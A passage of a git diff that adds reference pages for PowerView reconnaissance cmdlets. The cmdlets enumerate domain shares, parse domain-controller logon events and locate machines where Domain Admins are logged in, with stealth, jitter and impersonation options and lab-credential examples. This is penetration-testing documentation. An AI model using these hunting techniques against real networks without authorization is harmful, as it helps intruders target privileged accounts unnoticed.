+Accept wildcard characters: False
+```
+
+### -ProcessName
+Search for processes with one or more specific names.
+
+```yaml
+Type: String[]
+Parameter Sets: TargetProcess
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: UserIdentity, TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: TargetUser
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserProcess
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-DomainShare.md b/docs/Recon/Find-DomainShare.md
new file mode 100755
index 0000000..71274b7
--- /dev/null
+++ b/docs/Recon/Find-DomainShare.md
@@ -0,0 +1,335 @@
+# Find-DomainShare
+
+## SYNOPSIS
+Searches for computer shares on the domain.
+If -CheckShareAccess is passed,
+then only shares the current user has read access to are returned.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-DomainShare [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]
+ [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]
+ [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare.
+If -CheckShareAccess is passed, then
+\[IO.Directory\]::GetFiles() is used to check if the current user has read
+access to the given share.
+If -Credential is passed, then
+Invoke-UserImpersonation is used to impersonate the specified user before
+enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainShare
+```
+
+Find all domain shares in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainShare -CheckShareAccess
+```
+
+Find all domain shares in the current domain that the current user has
+read access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
+
+Searches for domain shares in the testlab.local domain using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Domain
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckShareAccess
+Switch.
+Only display found shares that the local user has access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: CheckAccess
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ShareInfo
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-DomainUserEvent.md b/docs/Recon/Find-DomainUserEvent.md
new file mode 100755
index 0000000..12e64a9
--- /dev/null
+++ b/docs/Recon/Find-DomainUserEvent.md
@@ -0,0 +1,451 @@
+# Find-DomainUserEvent
+
+## SYNOPSIS
+Finds logon events on the current (or remote domain) for the specified users.
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction
+
+## SYNTAX
+
+### Domain (Default)
+```
+Find-DomainUserEvent [-Domain <String>] [-Filter <Hashtable>] [-StartTime <DateTime>] [-EndTime <DateTime>]
+ [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>]
+ [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount] [-CheckAccess] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### ComputerName
+```
+Find-DomainUserEvent [[-ComputerName] <String[]>] [-Filter <Hashtable>] [-StartTime <DateTime>]
+ [-EndTime <DateTime>] [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>]
+ [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount]
+ [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]
+ [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+## DESCRIPTION
+Enumerates all domain controllers from the specified -Domain
+(default of the local domain) using Get-DomainController, enumerates
+the logon events for each using Get-DomainUserEvent, and filters
+the results based on the targeting criteria.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainUserEvent
+```
+
+Search for any user events matching domain admins on every DC in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$cred = Get-Credential dev\administrator
+```
+
+Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'
+
+Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local'
+domain controller using the alternate credential
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}
+```
+
+Find user events on the primary.testlab.local system where the event matches
+the IPAddress '192.168.52.200' or '192.168.52.201'.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$cred = Get-Credential testlab\administrator
+```
+
+Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}
+
+Find user events mathing the specified GUID AND the specified TargetLogonId, searching
+through every domain controller in the current domain, enumerating each DC in serial
+instead of in a threaded manner, using the alternate credential.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an explicit computer name to retrieve events from.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: dnshostname, HostName, name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies a domain to query for domain controllers to enumerate.
+Defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: Domain
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Filter
+A hashtable of PowerView.LogonEvent properties to filter for.
+The 'op|operator|operation' clause can have '&', '|', 'and', or 'or',
+and is 'or' by default, meaning at least one clause matches instead of all.
+See the exaples for usage.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StartTime
+The \[DateTime\] object representing the start of when to collect events.
+Default of \[DateTime\]::Now.AddDays(-1).
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now.AddDays(-1)
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -EndTime
+The \[DateTime\] object representing the end of when to collect events.
+Default of \[DateTime\]::Now.
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -MaxEvents
+The maximum number of events (per host) to retrieve.
+Default of 5000.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 5000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckAccess
+{{Fill CheckAccess Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target computer(s).
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogon
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)
+
diff --git a/docs/Recon/Find-DomainUserLocation.md b/docs/Recon/Find-DomainUserLocation.md
new file mode 100755
index 0000000..0d200aa
--- /dev/null
+++ b/docs/Recon/Find-DomainUserLocation.md
@@ -0,0 +1,579 @@
+# Find-DomainUserLocation
+
+## SYNOPSIS
+Finds domain machines where specific users are logged into.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction
+
+## SYNTAX
+
+### UserGroupIdentity (Default)
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>]
+ [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+### UserIdentity
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]
+ [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+### ShowAll
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserAdminCount]
+ [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]
+ [-Jitter <Double>] [-ShowAll] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember.
+Then for each server the
+function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
+The found user list is compared against the target list, and any matches are
+displayed.
+If -ShowAll is specified, all results are displayed instead of
+the filtered set.
+If -Stealth is specified, then likely highly-trafficed servers
+are enumerated with Get-DomainFileServer/Get-DomainController, and session
+enumeration is executed only against those servers.
+If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainUserLocation
+```
+
+Searches for 'Domain Admins' by enumerating every computer in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainUserLocation -Stealth -ShowAll
+```
+
+Enumerates likely highly-trafficked servers, performs just session enumeration
+against each, and outputs all results.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
+```
+
+Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged
+users in dev.testlab.local.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainUserLocation -Domain testlab.local -Credential $Cred
+
+Searches for domain admin locations in the testlab.local using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to query for computers AND users, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerUnconstrained
+Switch.
+Search computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Unconstrained
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: UserIdentity
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: UserGroupIdentity
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
